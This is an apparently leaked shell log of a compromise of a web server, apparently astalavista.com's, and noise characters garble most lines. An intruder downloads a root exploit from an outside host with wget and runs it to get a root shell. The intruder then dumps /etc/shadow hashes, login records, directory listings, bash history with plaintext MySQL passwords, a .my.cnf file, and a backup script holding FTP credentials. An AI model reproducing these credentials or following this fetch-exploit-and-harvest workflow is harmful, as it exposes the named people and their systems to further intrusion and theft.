) u6 O8 ~! a; f! [* |
sh-3.2$ uname -a* l( F5 h' S2 ~# D. E1 _* O
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
  e8 `8 E. u# b& Nsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]# V  E% {' C1 D7 S% R
–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]
* W' c5 {% L9 l  GResolving anti.sec.labs… 13.33.33.37
' W  C' y+ r- i2 b2 EConnecting to anti.sec.labs|13.33.33.37|:80… connected.
/ r# A( Y: S: T' E: KHTTP request sent, awaiting response… 200 OK( m& o: {) |0 y* L
Length: 18200 (18K) [text/plain]
( Q$ u: O' i# dSaving to: `g0troot’( V& J8 Z$ J$ s4 x; G  a

. \- N' s/ I9 A1 i& x7 U* b# F100%[=========================================================================================================================================>] 18,200      58.6K/s   in6 P, o, b& x1 w! D( x
0.3s
+ [9 r* C3 h4 D4 i8 E/ {  T5 h0 f4 G$ V
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]/ s8 t) t4 j# O' s/ P4 w4 ^

4 Z: }! \# H2 b/ I, tsh-3.2$ ./g0troot -i x86_64
. U1 _8 s6 E  u$ U7 c, a( R[+] g0troot - anti.sec.labs
- {) q! k* h2 O: V; v6 k) z[+] Target: 2.6.18-128.1.10.el5
+ V# ?! e9 Q; M: f9 `[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
& C$ [! h8 ^$ Z* `5 K
8 F3 Y. ?" B4 ^' s! ]1 G/ m9 m[+] r00tr00t$ n( |- G& g1 }' P
[~] Executing shell…, C, a1 ~% E$ J: G

( ?" B" Y7 T5 }; v4 gsh-3.2# id
2 E' h# Y9 _# j0 p+ U1 juid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)! B' y1 E2 p* q* T
! A7 @, r& l5 d$ f; G5 M
sh-3.2# cat /etc/shadow7 g+ S& x6 Y( |, J# V1 |
root1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
6 v* N  [% E; [$ J- Y) N8 n6 a[snip]% ^5 f$ s" z" a
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::2 E" ^! G7 L/ @# J
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
# Z' K+ Q+ G/ x' e$ S9 {com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
- T, I% z! U# }astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::# o+ y* I+ _) c: |: H( ~
, M* {: h/ o. D3 ^: o$ F3 {- `
sh-3.2# cat /etc/motd9 f1 B* U+ l# a9 J+ v' W9 x4 ~
#####################################################
  H) M6 h4 C9 [. E6 a- k/ H& [! X#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #+ @; x( r  X- C6 W% c# w9 k
# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
: ?0 }. D/ y& }* y7 H# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #
' D9 N) v+ O; Q! O; M#                                                   #2 ]& {$ j$ E  d
#####################################################. E: }, V: F& W* _8 V2 C
#                                                   #& {2 _. q5 N; u6 x- Y
# Admin Contact - 链接标记support@secureservertech.com      #5 W  }3 x% M: V
#                                                   #7 v1 x- e, V/ ?6 N  \5 H, {
# Available ShortCuts                               #
, J9 E; b/ Q  c$ A. P+ U#                                                   #
  u6 f, f! N9 I( V. Q# [9 `# nst -  list active connections                    #
0 P* H* T  [6 `6 c( o9 O# ddos - shows how many times each ip is connected  #
- F$ x+ A5 w5 V# ^$ b# ltr -  restart the webserver                      #
& o9 s5 y; x+ C8 r/ G# phpc - edit the php config file                   #/ t' ~7 T" E: y' ^
# htc -  edit the webserver configuration file      #" X2 G( f; I  T3 s4 Z
# up -   uptime                                     #* Y: B+ h6 b+ W1 W" J) |% h8 u+ P
# etd - edit the motd of the day file               #. ~6 ]1 v4 O; c$ _" H
# htr - start and restart apache if needed          #
' l: u; A7 x. D4 U9 y+ f# syng - shows active SYN_RECV connections          #5 E+ R3 ^- g" Q  [- L7 k. q, O( `
# synd - syn flood blocker - “synd -h” for usage    #
) P$ H: g8 [% U, _#####################################################
0 j% _5 g, r% f: e1 Q9 C$ p# NOTES:                                            #
" {! R" ?$ I: O8 x6 |# Last Upgrade - 12-08-2008 by JF                   #
/ ]' u4 r( t( f- i1 O( p# My.cnf/Mysql Optimization - 1-28-09               #
2 |9 ?6 }) E1 Q#                                                   #: D1 y( n& l- p9 [, o$ ^
#                                                   #0 j2 k7 C1 B0 `  }6 V5 B1 c  l
#                                                   #
9 k0 ^; B3 g+ Z0 ]! k& V2 d- {: l#####################################################
: a7 h/ C- Y2 X" b6 q; J* c; ~4 }1 Q" t
sh-3.2# lastlog | grep -v Never* l8 Y" A; O5 ]7 `* N- x
Username         Port     From             Latest
- ]4 K" f8 ^# W5 w+ Jroot             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009
! o" {4 U9 \2 c& e: W) |admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008, A, U; W) }' _
com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
" [/ z8 ~) t2 ?+ z$ Zastanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009  [6 O" z# b( z' N
" m; u8 P) \: }+ M4 D3 Y$ f+ H
sh-3.2# ls -la) ~' i! c0 T/ }' S8 Y& x0 [
total 4533762 o  i4 V6 E) q. _1 }  y
drwxr-x— 15 root root       4096 Jun  4 08:40 ./ }! i: o- N8 O4 h0 f( P
drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..- k- S: A) r, B7 x6 [
-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip( p1 o6 w0 G& R# F  L+ \" I0 X
-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
" h9 [5 g1 j* o3 r8 M2 X2 G-rw——-  1 root root      16836 Jun  4 07:21 .bash_history! J! ]2 k) N8 C! r, u4 \6 G
-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout
. F) c, Z6 c5 _2 Q-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile
, `: r# Q2 v8 d3 B: A2 n-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc( l8 a- \% H: P; f* w+ t& g
-rwx——  1 root root       1899 Oct 28  2007 bk.sh2 n% r2 H" G- l* P
-rw-r–r–  1 root root       1327 Nov 29  2007 cert- K0 x  T, u3 Z- D
-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql
1 X  O. o. _. I9 Mdrwxr-xr-x  4 root root       4096 May 20  2008 .cpan! t3 o6 G, U0 O. t
-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc
8 n% {7 G8 ^! [& I0 P  _/ L-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql& r) w9 r& M2 ^! F9 I4 K5 N
drwx——  2 root root       4096 Oct 28  2007 .elinks
8 a$ X1 i6 x9 i( ?- A$ Udrwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1) t/ @; i7 u$ \5 I$ f+ T
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2
! a7 ?5 Z0 V* x* G9 i* ^-rw——-  1 root root          0 Apr 16 13:19 .history
& K$ J$ P" {# C" a, C+ V+ y-rw-r–r–  1 root root      16095 Sep 11  2007 install.log
: S, K* ?  l6 s$ r- y+ g-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog, Q5 u  f3 m& e9 D
-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh
; v) e% m$ E! K  l-rw——-  1 root root         35 Jun  2 14:23 .lesshst  D: ^: e# Y  d0 }" l& ]' p
drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp
# `0 a/ X2 ]" e; S# adrwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
) [+ c5 Y" c$ w/ x0 t: T-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz
# S% i. y3 a3 E; ]5 [( t-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2
6 T3 _0 \6 E- K% K' Y2 j-rwx——  1 root root        760 Sep 18  2008 lp
& K' w! g' M. u, h! q, V2 \$ Zdrwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1% Z: U" E3 l: b, |$ E
-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz5 l& A7 q. g2 \3 q6 E, O
-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1( F( O9 ]6 i) B+ @7 F6 ?  B- Z: _
drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.90 ^+ W7 k* ?7 `9 K2 ^! Y* C
-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz* M0 Q5 s5 e8 f5 o, p$ ]
drwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3
' f5 [$ `8 U7 S/ ^4 Z6 e$ J+ c* @-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz8 Z  i5 Z; ~9 d( t: U& I3 I! ?; D
-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh
& p: K0 o+ P9 I- m) d7 l4 T-rw——-  1 root root         41 Oct 19  2007 .my.cnf( i8 @! e' u# q, B3 \
-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history
: c# U, j1 y" z6 ]8 p-rwx——  1 root root      38873 Apr 16  2008 mysqlreport
4 }1 ]1 t8 m+ T-rw——-  1 root root         41 May 20  2008 .mytop
: {; n8 h3 H, d# u1 ?- k; w( }3 fdrwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
( l6 _7 w7 Y( ^) v* |( G/ I-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
9 ]% V4 D/ F1 G% N9 cdrwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp
: _! O' P( Q) K. u& b-rw——-  1 root root       1462 Sep 21  2007 opt.php
  L: e  s. p% q7 D-rw-r–r–  1 root root       3371 Sep 22  2007 p
! u! X# W3 @/ P0 i3 o, L, @-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz20 i. \& ?1 n, Q' e2 J1 @4 U
-rw——-  1 root root       1024 Feb  3 21:32 .rnd
, {. b, u, P8 f& C-rw-r–r–  1 root root        716 Nov 28  2007 server.csr
, t- N) m3 h7 \2 M- H& ^% {; D( S3 a6 S-rw-r–r–  1 root root        887 Nov 28  2007 server.key
" ~) Q: O% a2 Y+ v7 ^. a  [5 tdrwx——  2 root root       4096 Oct 10  2008 .ssh% t1 P  @$ V2 c: N3 @9 l+ W
-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat6 k( I; p) \; f( L& h) [
-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc
2 i  G5 V/ b- ?  u; m* a+ i-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip6 \! ]) b% c8 b* G
-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.1
, _& L1 h) j0 ]drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp  x' \7 V, g9 U9 e
-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh
/ b. `$ x: U3 i) t3 ndrwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
/ i! E. m/ }5 E; s-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
! S* b: L. n% b; N+ l( L6 N( B-rw——-  1 root root      12997 May 16  2008 .viminfo
( m% P2 B  A& U2 R6 z
9 y9 B: Y6 ]4 E3 n4 m4 Tsh-3.2# cat .bash_history) O8 f8 [6 g2 m9 C0 @, s
[snip]* o7 F: E- P" r/ h2 Z% s8 l
wget cp4sst.com/sstlinux.tar.gz
' z! }! A/ o- Mtar zxvf sstlinux.tar.gz
  B0 e0 X  n0 dcd linux-2.6.27.10& b1 C+ h+ _& B  p, s$ @7 I. d
sh install.sh8 Y' v( V% F- W1 l
make bzImage ; make modules ; make modules_install ; make install
) ?. y8 `( v+ z  M* D5 Hmake clean
+ t5 m2 S# l/ e7 v8 K  |service mysqld restart1 x0 r: A" p* a
[snip]' `; Y1 {0 d4 Y% C
cd /usr/sbin/+ M% G" K7 E/ O* K* ]
chmod 4777 traceroute9 N  c: P4 s3 {: E1 }$ `# v+ v
chmod 4777 ping# ^: [4 w, p/ k/ N  x; t
traceroute -I 链接标记[url]www.astalavista.ch[/url]. ^/ g( j) P9 z  |. u
[snip]
! o4 w" t! Y7 x# H/ ]% j: K  cvi /etc/csf/csf.conf
1 c. q# A7 U6 [+ V- n. Xtraceroute google.ch
+ p/ H- S, N6 Xservice csf restart) |& c7 f2 S; N# ~/ r5 F
tracert google.ch. [; k2 g# E6 T4 I0 d$ j% G
service csf restart: Y% X2 `1 R8 \
traceroute 链接标记[url]www.google.ch[/url]# V% b; s4 R0 ~) `9 T. P
tracert 链接标记[url]www.google.ch[/url]) @2 h+ Y$ r/ ~1 z4 {
traceroute 链接标记[url]www.google.ch[/url]
/ D! s; ?3 g' l! V0 ilocate traceroute
% J4 ~7 }# H& Z4 U5 z# a7 Y( achown 4755 /bin/traceroute
0 j  F! P4 @* Q2 S* [7 Echown 4777 /bin/traceroute0 U! w& B; G) f. }( I
locate ping6 I: V3 ~3 `, N+ R# B
chown 4755 /bin/ping
! Z! o1 J. }9 Z: Echown 4777 /bin/ping" x- ]1 N* A' |, [" i' J" W
cd /bin/
: x/ f6 }: [, d1 N6 ]ls -ali | grep ping
) E( D& P) N" @  q1 e  Cchown root ping
8 z* u/ u7 ~; f, P; ochmod 4755 ping
+ K0 m; w# x: ?+ jls -ali | grep traceroute
" [) z6 @& Z' \1 @5 ?chown root traceroute( k' r' v, d% L# D
chmod 4755 traceroute4 T! M4 \4 F9 Z; y2 E* H1 E
ls -ali | grep traceroute
1 N* R: ~* d( b9 R; K. g. etraceroute -I 链接标记[url]www.google.ch[/url]1 q( \1 i/ p( s; p& |- b3 Q# X, d
traceroute 链接标记[url]www.google.ch[/url]
% b' t4 `& Q! z% a' l/ B7 zwhois pmsantos.ch$ k# I' y% f) i7 [6 p/ D4 F
[snip]% c1 L+ B# r1 b2 L8 {* W: {7 t
mysql -h com_contrexx2_live < /root/defaultp_ports.sql& r$ i7 D& t* C1 V7 r0 `
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql5 C7 \* _; B7 h$ L: x3 V$ g* V
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
" B8 P/ g5 p5 Emysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql/ I6 d9 U1 f8 y1 H+ i, K6 s( }
top* M  o# h1 Z7 ?% Z. P. G$ n
ping ssth.ch
& G. l% S$ [: ?; T# Uping asdlkfaljgasd???ljg???lasj.ch
: n7 K" E9 Y! `# x, X5 kping asdlkfaljgasdlasj.ch
. y/ _, I' `" y3 v, G$ ^5 Mping 链接标记[url]www.ssth.ch[/url]
1 Z& g% }9 S8 W" r8 `ping ssth.ch  i. }2 h/ ?2 v
nslookup 链接标记[url]www.google.ch[/url]5 |( ^+ {! t* {7 _# h+ C
nslookup 链接标记[url]www.ssth.ch[/url]4 f, f3 D% D8 H4 q/ Z
man nslookup
5 z7 O6 Y% n( ^8 {! [0 Rping 链接标记[url]www.google.ch[/url]
; O  H) e2 @7 ?/ Unslookup 链接标记[url]www.google.ch[/url]
. x, K) I  M: u% g! g8 R% wnslookup 链接标记[url]www.google.ch[/url]0 C0 R) `. U- S- x6 f; Z5 g2 c
nslookup salfjasdlf.ch. M( ^9 m6 o. D+ i$ {7 u. R7 N
[snip]
1 S! |- U0 q1 B" Z9 f) q0 jopenssl passwd -1 sadf4 r! J% r4 O; ?8 t2 ~/ S, c" Z1 }
openssl passwd -1 5cZNHstdTy: s" c3 ~" i, h1 T
mysql2 B, m$ u: ?: n1 K& ?* Y
mysql) s6 E1 T- R* j0 {
locate proftp! ~- q; M7 d7 S7 i+ {/ I
vi /etc/proftpd.passwd6 Z7 i$ v& J  o& p" S7 o& Q# a
service proftpd restart
  _0 R' L6 b, M$ ]locate proftpd.conf: C* \( U8 B- l) X& C6 h4 y" _
vi /etc/proftpd.conf
" T* d) D9 S+ Z* l* e2 Rvi /etc/proftpd.passwd
- W, A8 q4 y0 N' N% kservice proftpd restart7 I( p; K: B! J- \: t* z9 E( Y4 v% Z
[snip]5 f! L: r' u( }6 h2 D& Q2 P
/bin/sh /home/com/backup_system/backup.sh* t3 C  }6 a2 k( `6 u
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin/ [* w* C2 F( H# ?
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql4 W& ^# U2 L' d& w* ]$ _* V
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql2 k/ _; y' K8 W  u) t1 L0 s4 g2 ^
ls -ali; M% U9 @- ?! @
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
# g5 \2 h0 ?; C; @) r/ H" c! I7 imysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
1 @8 ]) W# V2 E" t4 Mcrontab -l/ t8 }' t# i* ?& K# M6 t
crontab -l3 Z. y% C: z9 _0 {+ L# k! K& x) K
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
' V5 q: L7 t. I1 k/home/com/public_html/modifications/cronjobs/exploits.sh: H: U% K& a) L; C/ K
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
4 q. G' c" @/ r* L& b8 F- B6 _3 Ltar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz( @) D; Y0 D3 H6 l5 M  W
cd lsws-4.0.3
) C$ W' O1 ?1 p8 [) R* W! U( ssh install.sh0 i) Z% u) E' j9 l5 g8 o
uptime* [  b' L& c9 i* l% L8 {: I8 \& U; j2 N
hdparm -tt /dev/sda
! _  ~9 p( ~3 j) xiostat
* x4 d% \+ h( ~( C9 n& o) eyum install iostat
# p2 }% t7 k* f, iiostat
, F, c' ]; o8 j6 y& U8 Owhereis iostat, s. G* `2 z: e! Y
yjm clean all: s9 ]# |& h( r- D. D1 g. e
yum clean all ; yum -y update
' j0 t/ S0 ^- U+ s% ~iostat
' b7 ^9 D5 e$ X6 fyum install systat) c; k! m( T+ M9 L
rpm -qa | grep iostat1 M# s8 [' b5 g2 f! ?% M
rpm -qa | grep sysstat) I4 V  l- q" _7 _2 D& [
rpm -qa | grep systat
3 {5 H5 A& w8 ?% d$ Fdmesg -c( s" f- G4 ~: ]0 p4 X5 I3 q
sysctl -p
) R4 j  k) F( q8 ?/ b: juname -r1 w3 q5 ]. e8 G, n* }
cd /usr/src4 z; L$ F$ Y8 y; e  i. H
wget nix101.com/kernels/sstlinux.tar.gz
. ^  ~  p! r) X: y  d$ }" @shutdown -r now
9 E' Q/ q& ?9 r! \& S- fnano -w /boot/grub/grub.conf) i! N6 G5 h( o  v7 {( Z7 i

  C3 ~" p& C' b$ k! ksh-3.2# cat .my.cnf
+ B0 ^# f: u/ p; f2 y[client]) ], u& P# Z: p3 G! g+ }; c
user=da_admin
" I1 [# X1 C4 b+ g6 o, ~& Apassword=X9dctmRH# E7 e. n9 ?9 H5 _

/ E  S5 }* F" \% r% V# g- L* esh-3.2# cat /home/com/backup_system/backup.sh& V) i7 R# |1 |$ H+ P, l" }- e
#!/bin/sh
! O7 W4 `* q7 F4 R* k& ?* A5 T###################################################################### w6 M' T2 J% \8 J. J8 M" ?
#                                                                   #) f) I  U- g# G% @+ d
#   incremental backup for astalavista.com                          #5 f; B0 y- v0 A0 d
#                                                                   #
: W9 q3 S4 @. T+ j# W+ y+ ]4 G#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #9 G# m1 l: M9 T; F4 Y
#                                                                   #
0 p2 j$ r- a! B5 p#####################################################################' c/ f+ g, s! ^
[snip]
- y' R& \1 P9 iPROG_DIR=”/home/com/backup_system”;- [3 M: S8 Y: M6 h- Z4 T! O# j- f
BACKUP_DIR=”/home/com/backups”;
, ], W; M* Y9 b7 |2 [+ KDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;& `$ z4 t7 N, a7 w' s+ f
# ftp for synology backup server0 V% q& C. M9 J/ N+ G  o$ {7 w
FTP_HOST=”212.254.194.163″;, c0 s. c% w+ C
FTP_PORT=”21″;
* a4 D" i/ s' M2 R! ZFTP_USER=”astalavista.com”;+ U# [4 G3 y9 M
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;: ]. |' t7 H! s$ a
FTP_DIR=”/astalavista.com”;
! j1 t2 g7 c7 x) h. @# database
7 Y) b/ q6 Y7 z0 `% _% p- K  ~DB_HOST=”localhost”;
; F0 I- i$ V6 }: C4 n1 GDB_USER=”contrexxuser2″;
, L6 J* @+ Q) J" H: PDB_PASS=”0fEYNZgXz1pKe”;, E8 k* D8 F5 u4 i
DB_DATABASE1=”com_contrexx2_live”;
9 L4 \! Y+ n- |' o: \9 D0 ]! F  Y$ y! rDB_DATABASE2=”com_contrexx2″;4 j* K% P5 y* z7 F$ M9 y- m" P  y
[snip]- s8 L6 r! l, ?1 g
ftp -in $FTP_HOST $FTP_PORT <<EOF6 M4 i! f0 I# W% I1 Z( J  _. u
quote USER $FTP_USER: v" B8 D+ G9 f7 t
quote PASS $FTP_PASS
0 w$ c' c/ f" h4 _; @/ k% f2 fcd $FTP_DIR
% u' q. c  h+ pput $DB_FULLNAME-SQL_Dump.tar
" I* {! X6 |, O- ]/ ?* n# Oput $BACKUP_FULLNAME-Public_HTML.tar+ u4 ^' R9 `4 H6 |8 a( U  d8 E
close
3 L2 z" Z; [; t3 bbye% N0 I) r4 G- B4 ?' P: f
EOF8 X( I4 D! r8 x& c! W4 z

, W, C  m# ^7 l/ Ash-3.2# cd /home
9 H, D. K: [* O3 K5 ^9 x; c5 _sh-3.2# ls -la
$ R) t; i& M# S* T8 }4 \total 120
0 p: ~0 g: U7 y, [5 Y# Ldrwxr-xr-x 14 root    root     4096 Mar 11 17:56 .- g& w3 v2 i/ J! `: k% `, Q% h
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
* n; l9 h+ U( ~) ydrwx–x–x  9 admin   admin    4096 Nov 28  2007 admin( C  S8 y; ~) q7 k$ N! D
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group3 H& n; h( S0 p
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
0 O" ?! O  s* `# B9 _4 Adrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet( [! `" {7 U0 u! t" _+ D( X! y
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup7 ^  }9 E% I" B3 a/ ]
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
8 r: T5 w7 N! y  `3 w5 Tdrwx–x–x 10 com     com      4096 Apr 28 12:40 com
+ X8 u8 ?! z% X( K) S# hdrwxr-xr-x  2 root    root     4096 May 17  2007 ftp
4 I% r3 z5 n3 f# cdrwx——  3 jon     jon      4096 Sep 21  2007 jon' \1 u+ w7 y/ g5 m' `  b
drwx——  2 root    root    16384 Sep 11  2007 lost+found
% `" k& f, L+ q  O: W5 vdrwxr-xr-x  2 root    root     4096 Sep 14  2007 my2 Q- U* T6 K0 E; H# w+ V
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata/ |% M& q) H) `3 y5 }/ q
drwx——  2 jon     jon      4096 Sep 15  2007 test7 P7 s- f5 x6 B2 {! a" U
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp- x  N& R( J: C( T0 m" l+ q

& B  g" B4 A. l- h7 Ish-3.2# cd admin
% V' A- b2 R9 F' {sh-3.2# ls -la% O. M* a7 |  Q; b' L4 ~4 l
total 17358969 _' A0 L6 y8 j7 M
drwx–x–x  9 admin admin       4096 Nov 28  2007 ., O0 \0 I* n& o' e9 [$ |
drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..
- K& i  A9 I& `4 idrwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups
% p% O1 |5 k3 W6 R+ E1 Rdrwx——  2 admin admin       4096 Sep 28  2007 backups7 j7 L9 o- p2 {3 ~* l: h0 D
-rw——-  1 admin admin        860 Sep 17  2008 .bash_history
9 G7 k0 [) Z2 R, X-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout
( e$ T+ e# ?* p- A0 C-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile
# A5 O3 F) D  U3 w; I-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc
' ^9 f4 Q4 U: k7 j# \drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups
+ V+ n# ^. I# {% ldrwx–x–x  6 admin admin       4096 Sep 21  2007 domains6 A1 H9 [2 k+ p* c8 e
drwxrwx—  3 admin mail        4096 Sep 21  2007 imap; M2 Q5 e9 p0 F# Y. J$ I
-rw-r–r–  1 root  root          24 Sep 21  2007 info.php
7 x  q- E: X6 d" f. edrwx——  2 admin admin       4096 Sep 21  2007 mail0 H" I$ ]* e; S  d& v/ p! H
-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr/ H- g6 q7 K3 y6 c' C4 w
-rw-r–r–  1 root  root         887 Nov 28  2007 server.key
% f- n* y% t4 P/ C; j' ~-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow
' B) T- j3 q* C8 O; u% }-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz/ D$ C! Y5 _5 q' y7 l  j
drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups0 q5 n3 z  O. w% ?7 g: i' Z6 E* x
/ K! P) ~0 I  Z+ p
sh-3.2# ..
, V% M- M" H& J% w% k% gsh-3.2# cd jon2 U0 r1 G! x- h0 `* k# ~+ V2 L
sh-3.2# ls -la
5 m7 w9 I/ D6 U0 ~5 Etotal 36
' L$ C4 O! G# L& B# c" Wdrwx——  3 jon  jon  4096 Sep 21  2007 .* }- |) ]  u& A
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..7 l: g7 a" l5 I! _2 P, L5 e$ j' E
-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history
) A/ |  i- G3 Q: g: L9 W1 F-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout
$ e- R; @2 Y3 e0 r-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile- d0 X: [" B8 C; n3 ]7 P! ^  x
-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc
) |; q0 M) d9 e% d! E. [% H-rw-r–r–  1 root root   24 Sep 21  2007 info.php7 M% i7 f3 ?9 p9 R# o
drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html
3 Y9 L; a0 O0 T- X9 F( p0 i$ n3 f4 k4 _# [; J
sh-3.2# cd ../ |, x/ ]* E4 c9 z$ X
sh-3.2# cd test; |- y. o( h- @9 L( w$ Y, B2 Z: H
sh-3.2# ls -la  R* K4 J* S0 e% s0 k( F: {2 e
total 48
+ B; ^4 V, ^$ L/ [1 q. a. |1 I6 h% edrwx——  2 jon  jon  4096 Sep 15  2007 .
; r0 u# L  K! z3 M* Bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
4 v# e. ]% ]0 ]1 W/ K% Z5 U! B-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history
* v1 v$ A9 `' f8 W0 v4 s# h) a-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout' y# u, K& I. F9 v
-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile( e; O5 T6 g: ~
-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc5 V, B1 y* B3 t6 G4 J" i2 z) J; f
sh-3.2# cat .bash_history1 S# Y# P7 S& C9 q' o" t, L
/usr/bin/mysqladmin -u root password PoliuJhytg67: _5 o+ f/ L& J7 C) v6 C

9 B+ w$ Z# \, D) j0 i# osh-3.2# cd ..6 B* A* s/ \' V9 o/ s
sh-3.2# cd astanet
; V) Y# y' P2 X( p6 R1 H: F6 Ysh-3.2# ls -la3 i3 b5 z5 `9 o! I) J
total 52
! P0 h9 D1 \+ P, p; L* C1 Ddrwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .
% i$ F9 f) Y" M: q& sdrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..2 i. Z5 ?/ X$ {5 ^# e' k3 ~9 e
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth% g6 Q4 a) H" D% a' r
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
& w  V$ x( k8 M9 r6 h7 E- r-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout" c' P+ ], `. v
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
